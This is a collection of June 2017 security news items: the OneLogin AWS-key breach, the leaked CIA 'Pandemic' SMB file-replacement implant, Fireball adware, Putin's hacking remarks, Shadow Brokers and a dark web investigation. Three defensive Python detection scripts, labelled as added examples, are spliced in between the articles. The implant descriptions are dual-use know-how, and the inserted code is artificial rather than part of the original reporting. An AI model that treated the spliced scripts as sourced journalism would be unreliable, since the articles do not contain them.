English Articles -


OneLogin Shares More Details on Breach, Customer Impact

2.6.2017 securityweek Hacking
Identity and access management firm OneLogin has shared more details on the data breach that hit its U.S. data center this week, including information on the method of attack and impact on customers.

OneLogin, whose services are used by more than 2,000 enterprises across 44 countries, informed customers on May 31 that on the same day it had detected and blocked unauthorized access at its U.S. data center.

While the company initially provided only a few details, citing an ongoing law enforcement investigation, it did mention that the attackers may have obtained the ability to decrypt encrypted data. This, together with the long list of actions that customers are required to complete following the incident, has led many to believe that the breach was serious.

OneLogin shared more information on Thursday and clarified that the attacker gained access to its systems using compromised Amazon Web Services (AWS) keys. The hacker used the stolen keys to access the AWS API from an intermediate host with a different, smaller US-based service provider.

“Through the AWS API, the actor created several instances in our infrastructure to do reconnaissance,” explained Alvaro Hoyos, CISO of OneLogin.

The attack appears to have started on May 31 at around 2 am PST and the affected AWS instance and the keys leveraged by the hacker were disabled roughly seven hours later after OneLogin staff noticed unusual database activity.
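The sequence described above (stolen AWS keys used through the AWS API from an outside host to create instances, noticed only hours later through database activity) is the kind of thing an account owner can catch earlier from API audit records. The following is an added example, not code from SecurityWeek or OneLogin: it scans CloudTrail-style event records for instance-provisioning calls made with a key from an address outside an expected network range, and lists the keys that should be deactivated pending investigation. The field names follow the CloudTrail record format; the events, addresses and access key id are constructed for the example.

```python
"""Added example (not from the article or OneLogin): flag AWS API calls that
provision capacity when they come from outside the networks we expect our
access keys to be used from.

The records are CloudTrail-style (eventName, sourceIPAddress,
userIdentity.accessKeyId); the values below are constructed."""
import ipaddress

# Constructed sample events: an operator working from the corporate egress
# range, then the same key launching instances from an unfamiliar host.
SAMPLE_EVENTS = [
    {"eventTime": "2017-05-31T09:01:12Z", "eventName": "DescribeInstances",
     "sourceIPAddress": "203.0.113.10",
     "userIdentity": {"accessKeyId": "AKIAEXAMPLEKEY000001"}},
    {"eventTime": "2017-05-31T09:05:40Z", "eventName": "RunInstances",
     "sourceIPAddress": "198.51.100.77",
     "userIdentity": {"accessKeyId": "AKIAEXAMPLEKEY000001"}},
    {"eventTime": "2017-05-31T09:06:02Z", "eventName": "RunInstances",
     "sourceIPAddress": "198.51.100.77",
     "userIdentity": {"accessKeyId": "AKIAEXAMPLEKEY000001"}},
]

# Networks from which API calls with our keys are expected (constructed).
TRUSTED_NETWORKS = [ipaddress.ip_network("203.0.113.0/24")]

# Calls that create compute or access an intruder could use for reconnaissance.
PROVISIONING_CALLS = {"RunInstances", "CreateKeyPair",
                      "AuthorizeSecurityGroupIngress"}


def is_trusted(ip: str) -> bool:
    """True when the source address falls inside one of our expected ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in TRUSTED_NETWORKS)


def find_suspicious_calls(events):
    """Return (accessKeyId, eventName, sourceIP, eventTime) tuples for
    provisioning calls issued from an address outside TRUSTED_NETWORKS."""
    hits = []
    for ev in events:
        if ev["eventName"] in PROVISIONING_CALLS and not is_trusted(ev["sourceIPAddress"]):
            hits.append((ev["userIdentity"]["accessKeyId"], ev["eventName"],
                         ev["sourceIPAddress"], ev["eventTime"]))
    return hits


def keys_to_disable(events):
    """Distinct access keys seen in suspicious calls; disable these first,
    then look at what the resulting instances touched."""
    return sorted({hit[0] for hit in find_suspicious_calls(events)})


if __name__ == "__main__":
    for hit in find_suspicious_calls(SAMPLE_EVENTS):
        print("suspicious:", hit)
    print("disable:", keys_to_disable(SAMPLE_EVENTS))
```

The check is deliberately narrow: a key used from a new network is not proof of compromise, but a key used from a new network to create instances is worth an immediate page, and deactivating the key is reversible if it turns out to be an operator on a new connection.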

After some OneLogin customers complained about the lack of information on what type of user data has been compromised, the company clarified that the threat actor gained access to a database containing data on users, apps and various types of keys.

“While we encrypt certain sensitive data at rest, at this time we cannot rule out the possibility that the threat actor also obtained the ability to decrypt data. We are thus erring on the side of caution and recommending actions our customers should take, which we have already communicated to our customers,” Hoyos said.

OneLogin previously reported suffering a data breach in August 2016, when the company warned users that hackers may have gained access to unencrypted Secure Notes data.


CIA Tool 'Pandemic' Replaces Legitimate Files With Malware

2.6.2017 securityweek BigBrothers
Documents published by WikiLeaks on Thursday describe a tool allegedly used by the U.S. Central Intelligence Agency (CIA) to spread malware on a targeted organization’s network.

The tool, named “Pandemic,” installs a file system filter driver designed to replace legitimate files with a malicious payload when they are accessed remotely via the Server Message Block (SMB) protocol.

What makes Pandemic interesting is the fact that it replaces files on-the-fly, instead of actually modifying them on the device the malware is running on. By leaving the legitimate file unchanged, attackers make it more difficult for defenders to identify infected systems.

“Pandemic does NOT//NOT make any physical changes to the targeted file on disk. The targeted file on the system Pandemic is installed on remains unchanged. Users that are targeted by Pandemic, and use SMB to download the targeted file, will receive the 'replacement' file,” the tool’s developers said.

Pandemic, which works on both 32-bit and 64-bit Windows systems, is initially installed on machines from which users download or execute files remotely via SMB. According to the documents leaked by WikiLeaks, the tool can replace up to 20 files at a time – each with a maximum size of 800Mb.

Pandemic developers also provide a DLL file that can be used to determine if the tool is installed, and uninstall it. The files published by WikiLeaks contain information that can be useful for checking a system for Pandemic infections. Experts also pointed out that there is an easy way to see if Pandemic is present on a device.


Giuseppe `N3mes1s` @gN3mes1s
Do you wanna know if you have Pandemic? REG QUERY HKLM\SYSTEM\CurrentControlSet\Services\Null . #pandemic #WIKILEAKS https://wikileaks.org/vault7/document/#pandemic …
6:12 PM - 1 Jun 2017

WikiLeaks has been publishing CIA files, which are part of a leak dubbed “Vault 7,” every Friday since March 23, except for last week. The tools exposed by the whistleblower organization include ones designed for hacking Samsung smart TVs, MitM tools, a framework used to make malware attribution and analysis more difficult, and a platform for creating custom malware installers.

The fact that WikiLeaks delayed last week’s dump until the day the Russian government once again denied interfering with U.S. elections has led some members of the infosec community to believe that the leaks may be timed to serve other purposes, not just to expose the CIA’s activities.

Jake Williams @MalwareJake
@wikileaks Now @wikileaks releases #pandemic documentation. Two things in hacking news today: Russia claims they don't do it and US definitely does 6/n
Jake Williams @MalwareJake
@wikileaks As you read the #pandemic dumps, be mindful of the fact that you are being manipulated by whoever controls @wikileaks access to this data 7/n
8:04 PM - 1 Jun 2017

Symantec and Kaspersky have found links between the tools exposed by Wikileaks and the malware used by a cyber espionage group tracked as “Longhorn” and “The Lamberts.”


Putin: Patriotic Russians Could Be Behind Election Hacks

2.6.2017 securityweek BigBrothers
Russian President Vladimir Putin says patriotic citizens may have launched politically motivated cyberattacks against foreign countries, but denied any government involvement in such operations.

Following accusations that Russian state-sponsored hackers interfered with the recent elections in the United States, Putin was asked on Thursday at the International Economic Forum in St. Petersburg about the possibility of Russian hackers influencing the upcoming elections in Germany. Putin responded by comparing hackers to artists.

“If artists get up in the morning feeling good, all they do all day is paint,” Putin said. “The same goes for hackers. They got up today and read that something is going on internationally. If they are feeling patriotic they will start contributing, as they believe, to the justified fight against those speaking ill of Russia.”

The Russian president noted that while this is possible in theory, his country does not engage in such activities on a government level. Putin also highlighted that threat actors could launch attacks and make it look like the source was Russia – a task that he described as “very easy.”

On the other hand, Putin said he was convinced that hackers cannot have a real impact on an election campaign.

“We do not engage in this activity at the government level and are not going to engage in it. On the contrary, we try to prevent this from happening in our country,” he said. “At any rate, I believe that no hackers can affect the election campaign in any European country, nor in Asia or in America.”

The United States has officially accused Russia of attempting to interfere with recent elections and an investigation has been launched to assess the impact of the cyberattacks on their outcome.

Thomas Rid, a professor in the department of War Studies at King's College London, believes the comments made by Putin are strategic.

Thomas Rid comments on Putin statement

Russian hackers are also believed to have targeted the political campaign of French President Emmanuel Macron. The attacks were uncovered by security firms, but the U.S. National Security Agency (NSA) also claimed to have warned France of the attacks.

The threat groups tracked as Fancy Bear (aka APT28, Pawn Storm, Sofacy Group, Sednit and STRONTIUM) and Cozy Bear (aka APT29, Office Monkeys and Cozy Duke) are widely believed to be associated with Russia. While many security firms refrain from making statements on attribution or simply point out that the hackers speak Russian, some companies have gone as far as to link them to Russian government agencies, such as the Federal Security Service (FSB), the Foreign Intelligence Service (SVR), and the military intelligence agency GRU.


Facebook Redesigns Security Settings Page

2.6.2017 securityweek Social
Facebook this week announced the roll-out of a redesigned security settings page, meant to make it easier for users to understand the options provided to them.

As part of the redesign, the social networking platform focused on making important settings easily identifiable and more visible to all users. The changes are based on the results of research the company recently conducted to better understand how people use security settings on Facebook, explains Heidi Shin, product manager on the Protect and Care team.

Users accessing Facebook’s security settings page will find items such as two-factor authentication and Trusted Contacts at the top, in a recommended section. The featured recommendations are tailored according to each person’s needs and similar options are grouped into modules for simplified layout and ease of use.

Another important change Facebook made to its security settings was to bring the names of different options in line with those used by other online services. Thus, two-factor authentication is now visible under this name, and not “login approvals,” as before.

“After finding in our research that ‘two-factor authentication’ was the most recognized term, we adjusted the name. By focusing on clarity, we’re making it easier for people to find and enable these features on Facebook as well as other online services,” Shin notes.

Additionally, Facebook decided to completely redesign the “Where you're logged in” module, which now features a simpler format, clearly showing the device, location, and login date and time for each place a user’s logged in.

“We also looked closely at features that people had clicked on but ultimately decided not to enable. We found that it was usually the product description — not the name itself — that was discouraging people from completing the action,” Shin explains.

Users looking to improve their security on the social platform can do so by clicking the arrow in the top right corner of the screen, selecting Settings, and then clicking Security + Login on the left-hand side to access the redesigned page.


OneLogin Password Manager Hacked; Users’ Data Can be Decrypted

2.6.2017 thehackernews Hacking

Do you use OneLogin password manager? If yes, then immediately change all your account passwords right now.
OneLogin, the cloud-based password management and identity management software company, has admitted that the company has suffered a data breach.
The company announced on Thursday that it had "detected unauthorised access" in its United States data region.
Although the company did not provide many details about the nature of the cyber attack, the statement released by the firm suggests that the data breach is extensive.
What Happened? OneLogin, which aims at offering a service that "secures connections across all users, all devices, and every application," has not yet revealed potential weaknesses in its service that may have exposed its users’ data in the first place.
"Today We detected unauthorised access to OneLogin data in our US data region," OneLogin chief information security officer Alvaro Hoyos said in a brief blog post on Wednesday night.
What type of Information? Although it is not clear exactly what data has been stolen in the hack, a detailed post on a customer-only support page apparently says that all customers served by the company's US data centre are affected and that their data has been compromised.
The stolen data also includes "the ability to decrypt encrypted data."
What is OneLogin doing? OneLogin has blocked the unauthorised access to its data centre and is actively working with law enforcement and security firm to investigate the incident and verify the extent of the impact.
"We have since blocked this unauthorised access, reported the matter to law enforcement, and are working with an independent security firm to determine how the unauthorised access happened and verify the extent of the impact of this incident," Hoyos said.
"We are actively working to determine how best to prevent such an incident from occurring in the future."
What Should You Do Now? First of all, change passwords for all your accounts that you have linked with OneLogin.
The company has given customers an extensive list of actions to do to protect themselves and minimise the risk to their data, which includes:
Forcing a password reset for all of its customers.
Generating new security credentials, OAuth tokens, and certificates for apps and websites.
Recycling secrets stored in OneLogin's secure notes.
For any other queries, OneLogin customers can contact the company at security-support@onelogin.com.
You should also particularly be alert of the Phishing emails, which are usually the next step of cyber criminals after a breach. Phishing is designed to trick users into giving up further details like passwords and bank information.
This is the second data breach the company has suffered within a year. In August 2016, OneLogin suffered a separate data breach in which an unauthorized hacker gained access to one of the company’s standalone systems, which it used for "log storage and analytics."


Putin: Hackers Are Like Artists, Who Wake Up In A Good Mood & Start Painting

2.6.2017 thehackernews BigBrothers

Just control your laughter, while reading this article. I insist.
Talking to international media at the St Petersburg Economic Forum on Thursday, Russian President Vladimir Putin made a number of statements surrounding Russia's alleged involvement in hacking.
If you are not aware, Russia has been the focus of the U.S. investigations for its purported role in interfering with the 2016 US presidential election, which saw several major hacks, including Democratic National Committee and Hillary Clinton campaign emails.
The US authorities and intelligence community concluded in January that Mr. Putin had personally directed cyber attacks against Democrats and the dissemination of false information in order to influence US election and help Mr. Trump win the election.
Putin: Russia Has Never Been Involved in Hacking

Today Mr. Putin denied all the allegations of Russian engagement in the U.S. election hacking, saying that the Russian state had never been involved in hacking.
I know you would take some time even to digest this statement, but trust me this one is nothing. You would start laughing after reading his other comments mentioned in this article.
"We don't engage in that at the state level," Mr. Putin said, according to the Associated Press.
"I'm deeply convinced that no hackers can radically influence another country's election campaign," Mr. Putin added. "No hackers can influence election campaigns in any country of Europe, Asia or America."
So, Putin, who limits the freedom of the press and is accused of killing political opponents and journalists to prevent them from reporting on topics that can anger the Kremlin, is saying that "no information will change the minds of the people or influence the outcome" of the election.
Putin: Patriotic Hackers May Have Targeted U.S. Election

Besides insisting that the Russian government has no involvement in such cyber attacks, Mr. Putin said that some individual "patriotic" hackers who love their country could mount such attacks against those who "speak negatively about" their country.
"If they are patriotically minded, they start making their contributions – which are right, from their point of view – to fight against those who say bad things about Russia," Mr. Putin said.
Is he just encouraging hackers to conduct cyber attacks against rival nations by making such comments?
As for his dealings with US President Donald Trump, Mr. Putin also said Moscow would wait for the current political storm in the United States to settle down before he attempts to forge constructive relations with Mr. Trump, whom he praised for being "straightforward" with "fresh set of eyes."
Putin: Hackers are Like Artists, Who Wake Up and Start Painting!

"Hackers are free people, just like artists who wake up in the morning in a good mood and start painting," Mr. Putin said.
"The hackers are the same, they would wake up, read about something going on in interstate relations and if they have patriotic leanings, they may try to add their contribution to the fight against those who speak badly about Russia."
So, Mr. Putin wants to say that hackers can contribute to their nation by attacking their country’s rivals. WOW!
Describing hackers as free-spirited artists acting according to their moods, Mr. Putin said cyber attacks on DNC and Hillary Clinton presidential campaign could be made to look like they had come from Russia when they hadn't actually.
"I can imagine that some do it deliberately, staging a chain of attacks in such a way as to cast Russia as the origin of such an attack," Mr. Putin added. "Modern technologies allow that to be done quite easily."
Mr. Putin's remarks are similar to the ones from Mr. Trump, who has previously dismissed accusations of Russian involvement in the DNC hack and said that the hacks could be by "somebody sitting on their bed that weighs 400 pounds."
While Mr. Putin may deny the hacking allegations, which he believes are "not based on facts," many cyber security and espionage experts have discovered that Russia has in the past "outsourced" its hacking efforts to state-sponsored criminal gangs.


#Vault7: CIA Pandemic implant turns file servers into malware infectors
2.6.2017 securityaffairs BigBrothers

Wikileaks released a new lot of documents belonging to the Vault7 dump that detail the CIA project codenamed ‘Pandemic’.
Wikileaks released a new batch of documents belonging to the Vault7 archive related to the CIA project codenamed ‘Pandemic.’


WikiLeaks ✔ @wikileaks
RELEASE: CIA 'Pandemic' Windows infection malware documentation #Vault7 https://wikileaks.org/vault7/#Pandemic …
7:34 PM - 1 Jun 2017
The Pandemic CIA project refers to a persistent Windows implant for machines that share files (programs) with remote users on a local network. The cyber spies use Pandemic to infect remote users by replacing application code on-the-fly with a trojaned version of the application when it is retrieved from the infected machine.

“Today, June 1st 2017, WikiLeaks publishes documents from the “Pandemic” project of the CIA, a persistent implant for Microsoft Windows machines that share files (programs) with remote users in a local network,” reads the description published by Wikileaks. “‘Pandemic’ targets remote users by replacing application code on-the-fly with a trojaned version if the program is retrieved from the infected machine.”

The implant transforms file servers into machines that infect PCs which access them remotely.

A computer on a local network with shared drives that is infected with the Pandemic implant is the equivalent of a Patient Zero spreading a disease: it will compromise remote computers whenever a user executes applications stored on the Pandemic file server.


The Pandemic tool doesn’t change the file on the infected system; when victims request that file from it, they receive a trojanized replacement of the legitimate application instead.

The Pandemic implant can replace up to 20 programs, with a maximum size of 800MB.

“Pandemic is a tool which is run as kernel shellcode to install a file system filter driver. The filter will ‘replace’ a target file with the given payload file when a remote user accesses the file via SMB (read-only, not write).” reads the Pandemic Implant tool summary. “Pandemic will not ‘replace’ the target file when the target file is opened on the machine Pandemic is running on. The goal of Pandemic is to be installed on a machine where remote users use SMB to download/execute PE files. (S//NF) Pandemic does NOT//NOT make any physical changes to the targeted file on disk. The targeted file on the system Pandemic is installed on remains unchanged. Users that are targeted by Pandemic, and use SMB to download the targeted file, will receive the ‘replacement’ file.”

The Pandemic data leak contains five files. Installation of the implant is very rapid, taking just 10 to 15 seconds.
The documentation does not describe the infection process in detail; in particular, it does not specify whether infected machines become new Pandemic servers.
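Because the tool summary says the on-disk file is untouched and only remote SMB reads receive the substitute, a defender can compare a file as read on the share host itself with the same file as fetched by a client over SMB: for an unchanged file the two hashes should agree, and a mismatch is the condition to investigate. The script below is an added example, not part of the Security Affairs article or the leaked documents; the two directories and file names are constructed stand-ins for the server-local view and the client's fetched copy, and in real use the second path would be a copy pulled from the UNC share by a client.

```python
"""Added example (not from the article or the Pandemic documents): hash a file
as read locally on the share host and as fetched by a client over SMB, and
report the names whose client copy differs.

Per the leaked summary Pandemic does not touch the on-disk file and only
substitutes the payload on remote SMB reads, so a disagreement between the
two hashes of an otherwise unchanged file points at on-the-fly replacement.
Paths and file contents below are constructed."""
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path) -> str:
    """Stream the file in 1 MiB chunks so large PE files do not need to fit in memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def compare_copies(server_side_path, client_fetched_path) -> dict:
    """server_side_path: the file as read on the share host itself;
    client_fetched_path: the same file as copied by a client from the share.
    Returns both hashes and whether they disagree."""
    server_hash = sha256_of(server_side_path)
    client_hash = sha256_of(client_fetched_path)
    return {"server_sha256": server_hash, "client_sha256": client_hash,
            "substituted": server_hash != client_hash}


def audit_share(server_root, client_root, names):
    """Check several files at once; returns the names whose fetched copy differs."""
    return [n for n in names
            if compare_copies(Path(server_root) / n, Path(client_root) / n)["substituted"]]


def demo_audit() -> dict:
    """Constructed demo: two temporary directories stand in for the server-local
    view and the client's fetched copies; one file differs, as a substituted
    executable would, the other is identical."""
    with tempfile.TemporaryDirectory() as d:
        srv, cli = Path(d) / "server", Path(d) / "client"
        srv.mkdir()
        cli.mkdir()
        (srv / "tool.exe").write_bytes(b"MZ legit")
        (cli / "tool.exe").write_bytes(b"MZ payload")
        (srv / "readme.txt").write_bytes(b"hello")
        (cli / "readme.txt").write_bytes(b"hello")
        return {"substituted": audit_share(srv, cli, ["tool.exe", "readme.txt"]),
                "readme_server_sha256": sha256_of(srv / "readme.txt")}


if __name__ == "__main__":
    print(demo_audit())
```

The server-side hash has to come from a session on the host itself (or from a known-good inventory taken before the share was exposed), not from another SMB read, since that read would go through the same filter. Hashing a handful of executables that users actually launch from the share is enough to tell whether remote reads are being rewritten.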

Let’s wait for the next Vault


Beware! Fireball Malware Infects Nearly 250 Million Computers Worldwide
1.6.2017 thehackernews Virus
Security researchers have discovered a massive malware campaign that has already infected more than 250 million computers across the world, including Windows and Mac OS.
Dubbed Fireball, the malware is an adware package that takes complete control of victims' web browsers and turns them into zombies, potentially allowing attackers to spy on victims' web traffic and steal their data.
Check Point researchers, who discovered this massive malware campaign, linked the operation to Rafotech, a Chinese company which claims to offer digital marketing and game apps to 300 million customers.
While the company is currently using Fireball for generating revenue by injecting advertisements onto the browsers, the malware can be quickly turned into a massive destroyer to cause a significant cyber security incident worldwide.
Fireball comes bundled with other free software programs that you download off of the Internet. Once installed, the malware installs browser plugins to manipulate the victim's web browser configurations to replace their default search engines and home pages with fake search engines (trotux.com).
"It's important to remember that when a user installs freeware, additional malware isn't necessarily dropped at the same time." researchers said. "Furthermore, it is likely that Rafotech is using additional distribution methods, such as spreading freeware under fake names, spam, or even buying installs from threat actors."
The fake search engine simply redirects the victim's queries to either Yahoo.com or Google.com and includes tracking pixels that collect the victim's information.

Far from legitimate purpose, Fireball has the ability to spy on victim's web traffic, execute any malicious code on the infected computers, install plug-ins, and even perform efficient malware dropping, which creates a massive security hole in targeted systems and networks.
"From a technical perspective, Fireball displays great sophistication and quality evasion techniques, including anti-detection capabilities, multi-layer structure, and a flexible C&C– it is not inferior to a typical malware," researchers said.
Currently, Fireball adware is hijacking users' web traffic to boost its advertisements and gain revenue, but at the same time, the adware has the capability to distribute additional malware.
"Based on our estimated infection rate, in such a scenario, one out of five corporations worldwide will be susceptible to a major breach," researchers added.
According to researchers, over 250 million computers are infected worldwide, 20 percent of them are corporate networks:
25.3 million infections in India (10.1%)
24.1 million in Brazil (9.6%)
16.1 million in Mexico (6.4%)
13.1 million in Indonesia (5.2%)
5.5 million In US (2.2%)
"How severe is it? Try to imagine a pesticide armed with a nuclear bomb. Yes, it can do the job, but it can also do much more," researchers warned. "Many threat actors would like to have even a fraction of Rafotech's power."
Warning Signs that Your Computer is Fireball-Infected
If the answer to any of the following questions is "NO," that means your computer is infected with Fireball or a similar adware.
Open your web browser and check:
Did you set your homepage?
Are you able to modify your browser's homepage?
Are you familiar with your default search engine and can modify that as well?
Do you remember installing all of your browser extensions?
To remove the adware, just uninstall the respective application from your computer (or use an adware cleaner software) and then restore/reset your browser configurations to default settings.
The primary way to prevent such infections is to be very careful when you agree to install.
You should always pay attention when installing software, as software installers usually include optional installs. Opt for custom installation and then de-select anything that is unnecessary or unfamiliar.
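The four warning-sign questions above can be checked mechanically on a Chromium-based browser profile. The script below is an added example, not code from The Hacker News or Check Point: it reads a Chromium-style Preferences JSON document and reports the homepage, startup pages and default search provider whose host is not on an allowlist of engines the user is expected to have chosen. The key paths used (homepage, session.startup_urls, default_search_provider_data.template_url_data.url) are assumed to match Chrome's Preferences layout; the sample document is constructed, with the trotux.com host taken from the article.

```python
"""Added example (not from the article or Check Point): audit a Chromium-style
Preferences document for a homepage, startup URLs or default search engine
pointing at a host the user did not choose.

Key paths are assumed to follow Chrome's Preferences layout; the sample
profile below is constructed."""
import json
from urllib.parse import urlparse

# Hosts a user is expected to have chosen (constructed allowlist; extend it
# with whatever your organisation actually deploys).
EXPECTED_HOSTS = {"www.google.com", "google.com", "search.yahoo.com",
                  "www.bing.com", "duckduckgo.com"}

# Constructed sample of a hijacked profile, not a real profile dump.
SAMPLE_PREFERENCES = json.dumps({
    "homepage": "http://www.trotux.com/?z=abc",
    "session": {"restore_on_startup": 4,
                "startup_urls": ["http://www.trotux.com/?z=abc"]},
    "default_search_provider_data": {
        "template_url_data": {"keyword": "trotux.com",
                              "url": "http://www.trotux.com/?q={searchTerms}"}},
})


def _get(d, *keys):
    """Walk a nested dict, returning None when any key is missing."""
    for k in keys:
        if not isinstance(d, dict) or k not in d:
            return None
        d = d[k]
    return d


def collect_urls(prefs: dict) -> dict:
    """Map each setting of interest to the URL(s) the profile currently uses."""
    found = {}
    if _get(prefs, "homepage"):
        found["homepage"] = [prefs["homepage"]]
    startup = _get(prefs, "session", "startup_urls") or []
    if startup:
        found["startup_urls"] = list(startup)
    search = _get(prefs, "default_search_provider_data", "template_url_data", "url")
    if search:
        found["default_search"] = [search]
    return found


def audit_preferences(prefs_json: str, expected_hosts=EXPECTED_HOSTS) -> list:
    """Return (setting, host) pairs whose host is not in expected_hosts."""
    prefs = json.loads(prefs_json)
    findings = []
    for setting, urls in collect_urls(prefs).items():
        for url in urls:
            host = (urlparse(url).hostname or "").lower()
            if host not in expected_hosts:
                findings.append((setting, host))
    return findings


if __name__ == "__main__":
    for setting, host in audit_preferences(SAMPLE_PREFERENCES):
        print(f"{setting}: unexpected host {host}")
```

A profile whose three settings all resolve to one unfamiliar host, as in the sample, matches the behaviour the article describes; the allowlist is the part to adapt, since any engine the user legitimately picked will otherwise show up as a finding.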


Fireball Malware Infects 250 Million Computers

1.6.2017 securityweek  Virus
A newly discovered piece of malware managed to infect more than 250 million computers in a widespread campaign run by a Chinese digital marketing agency, Check Point researchers warn.

Dubbed Fireball, the malware can take over the targeted browser, run arbitrary code on a victim’s computer, and spy on victims. Thus, its operators can download any file or malware onto the machine, and can also manipulate the infected user’s web traffic to generate ad revenue.

“Currently, Fireball installs plug-ins and additional configurations to boost its advertisements, but just as easily it can turn into a prominent distributor for any additional malware,” Check Point says.

The campaign, the security company reveals, is run by a large digital marketing agency based in Beijing, called Rafotech. With the help of this malware, the agency manipulates the victims’ browsers to turn search engines and home-pages into fake search engines, redirect queries to Yahoo.com or Google.com, and collect victims’ private information via tracking pixels included in the fake search engines.

Rafotech’s fake search engines have high popularity, with 14 of them ranked among the top 10,000 websites, some occasionally reaching top 1,000. Despite denying the use of browser-hijackers and fake search engines, Rafotech claims to have 300 million users worldwide, a number similar to the estimated infections.

To date, Fireball has infected over 250 million computers worldwide, being distributed mainly bundled with legitimate programs. India (25.3 million infections) and Brazil (24.1 million) were hit the most, followed by Mexico (16.1 million), and Indonesia (13.1 million). A total of 5.5 million infected machines are located in the United States.

Check Point also says that 20% of all corporate networks have been affected. Indonesia (60%), India (43%) and Brazil (38%) were hit the most. The hit rate in the US is 10.7%, while reaching only 4.7% in China.


As a browser-hijacker, Fireball is capable of driving victims to malicious sites, spying on them, and also successfully dropping malware onto their machines. The malware also “displays great sophistication and quality evasion techniques, including anti-detection capabilities, multi-layer structure and a flexible C&C,” Check Point says.

Thus, Fireball provides Rafotech with a potent backdoor that can be further exploited, the security researchers point out.

By using digital certificates, Fireball’s distribution can appear legitimate, and “Rafotech carefully walks along the edge of legitimacy,” Check Point says. For that, the company uses bundling, where a wanted program installs additional software, either with or without user’s consent.

Rafotech’s distribution methods, however, don’t follow criteria that would allow for them to be considered legal. The malware and the fake search engines, on the other hand, don’t carry indicators that could connect Rafotech to them. They can’t be uninstalled by an ordinary user either, and they conceal their true nature.

For distribution purposes, the malware is believed to be bundled with other Rafotech products, such as Deal Wifi and Mustang Browser, or with products such as “Soso Desktop”, “FVP Imageviewer” and other software from freeware distributors. The distribution of freeware under fake names, spam, or even buying installs from threat actors might have also helped Rafotech in its distribution efforts.

“It’s important to remember that when a user installs freeware, additional malware isn’t necessarily dropped at the same time. If you download a suspicious freeware and nothing happens on the spot, it doesn’t necessarily mean that something isn’t happening behind the scenes,” Check Point says.

Other browser-hijackers that behave similarly have also been discovered, including one designed by ELEX Technology, a company that builds software similar to Rafotech’s and is supposedly related to it (either in the distribution of hijackers or in the trading of customer data).

Having great potential for harvesting sensitive information, Fireball and similar browser-hijackers can pose a huge threat to users and organizations worldwide, should Rafotech (or a similar company) decide to actually gather user information. It could steal banking and credit card credentials, medical files, patents and business plans, and other types of sensitive information.

“Based on our estimated infection rate, in such a scenario, one out of five corporations worldwide will be susceptible to a major breach. Severe damage can be caused to key organizations, from major service providers to critical infrastructure operators to medical institutions. The potential loss is indescribable, and repairing the damage caused by such massive data leakage (if even possible) could take years,” Check Point says.

While this is not a typical malware attack, the campaign has a huge potential to cause harm, and should be blocked, the security company says. Check Point also provides instructions on how users can remove the malware and add-ons from their machines (for both Windows and Mac users).


Crowdfunding for Acquiring Shadow Brokers Exploits Canceled

1.6.2017 securityweek  Exploit

Researchers announced this week the launch of a crowdfunding initiative whose goal was to raise money to subscribe to the Shadow Brokers’ monthly exploit leaks. However, the funding campaign has been canceled due to legal reasons.

The hacker group called Shadow Brokers announced on Tuesday that interested parties can obtain exploits and information by paying a monthly fee of 100 Zcash (roughly $20,000). The hackers claim they possess a lot of data allegedly stolen from the NSA-linked Equation Group, including exploits, SWIFT network data, and information on nuclear and missile programs in Russia, China, Iran and North Korea.

A group led by Hacker House co-founder Matthew Hickey and the researcher known online as “x0rz” launched a Patreon-based crowdfunding campaign to raise the 100 Zcash needed to subscribe to the Shadow Brokers’ monthly dumps.

The plan was to immediately notify affected vendors of any zero-day exploits in hopes of avoiding another attack similar to the WannaCry ransomware, which leveraged a Windows SMB exploit leaked by Shadow Brokers. While Microsoft patched the flaw in March, weeks before the WannaCry attacks, many companies were not aware of the risks and neglected to patch it.

Hickey conducted a survey to get the infosec community’s view on the crowdfunding idea, and just over half of the roughly 1,800 votes supported the initiative. Some industry professionals pointed to the legal and ethical implications, while others noted that the Shadow Brokers have likely already leaked all the valuable exploits, or that they will leak the data anyway as they are simply doing it for the attention.

The project raised nearly $4,000 in just 36 hours, but the initiators of the campaign decided to pull the plug after seeking legal advice. The pledged funds will be refunded or donated to the Electronic Frontier Foundation (EFF).

“If you ever want to hear a lawyer shout expletives at volume down a phone you need to call him and tell him that you have created the first open source crowd-funded cyber arms acquisition attempt,” Hickey said. “It transpires that should funds change hands from ours to the Shadow Brokers we would be certainly risking some form of legal complications. It was just too risky and the advice was under no circumstances to proceed further with this.”

While it’s still not clear who is behind the Shadow Brokers – some point to Russia, while others to an NSA insider – Hickey said he learned that the group is linked to Russia’s Federal Security Service (FSB), which complicated the situation even further.

The Shadow Brokers have denied having anything to do with Russia and they claim their main goal is to make money. However, all their attempts, including auctions and crowdfunding initiatives, have so far failed. It remains to be seen if anyone signs up for their monthly dump service.

In the meantime, The Washington Post reported – and confirmed speculation – that it was the NSA who informed Microsoft about the Windows vulnerability exploited by WannaCry. The infosec community has been urging the intelligence agency to disclose the Equation Group exploits to affected vendors given that they could be made public at any time.


Dark Web users of a child porn website tracked after visiting file sharing site
1.6.2017 securityaffairs CyberCrime

The U.S. Department of Homeland Security (DHS) has identified dark web users after they downloaded media through a file-sharing service on the public Internet.
The DHS obtained the IP addresses of several suspects who had visited a child porn site hosted as a Tor hidden service.

According to court filings, the suspects shared links to password-protected child pornography archives hosted on the Ziifile file-sharing service, which is reachable over the public Internet rather than through Tor.
The court documents do not name the child porn website, which investigators refer to as “Bulletin Board A,” a popular hidden service with more than 23,000 users.

“Bulletin Board A had over 1,500 ‘approved users,’ who actively posted new content and engaged in online discussions involving the sexual exploitation of minors. In general, members would post preview images and download links to several different cloud-based storage services. Among other things, these posts contained the…” reads the court order, which also defines the term: “‘Bulletin Board’ means an Internet-based website that is either secured (accessible with a password) or unsecured, and provides members with the ability to view postings by other members and make postings themselves.”
Investigators then tracked every user who followed those links to the file-sharing service to download the archives containing the material.

“The Department of Homeland Security was able to gain crucial information on several child pornography website users without resorting to highly specialized methods, such as deploying special exploits or new techniques.” reads Darkwebnews.com.

The technique used by law enforcement is simple and does not rely on any exploit code to de-anonymize Tor users: the file-sharing service sits on the public Internet, so downloads made outside Tor reached it from the users’ real IP addresses, which the service logged.

The case shows that misusing an anonymizing service, in this instance leaving the Tor network to fetch a file from a clearnet host, can expose a user’s identity.

The authorities also obtained from the file-sharing service records of the downloads of files posted by members of the dark web pornography website.

According to Motherboard, law enforcement has already arrested three suspects who used the file-sharing site to download child porn material linked from the dark web site.


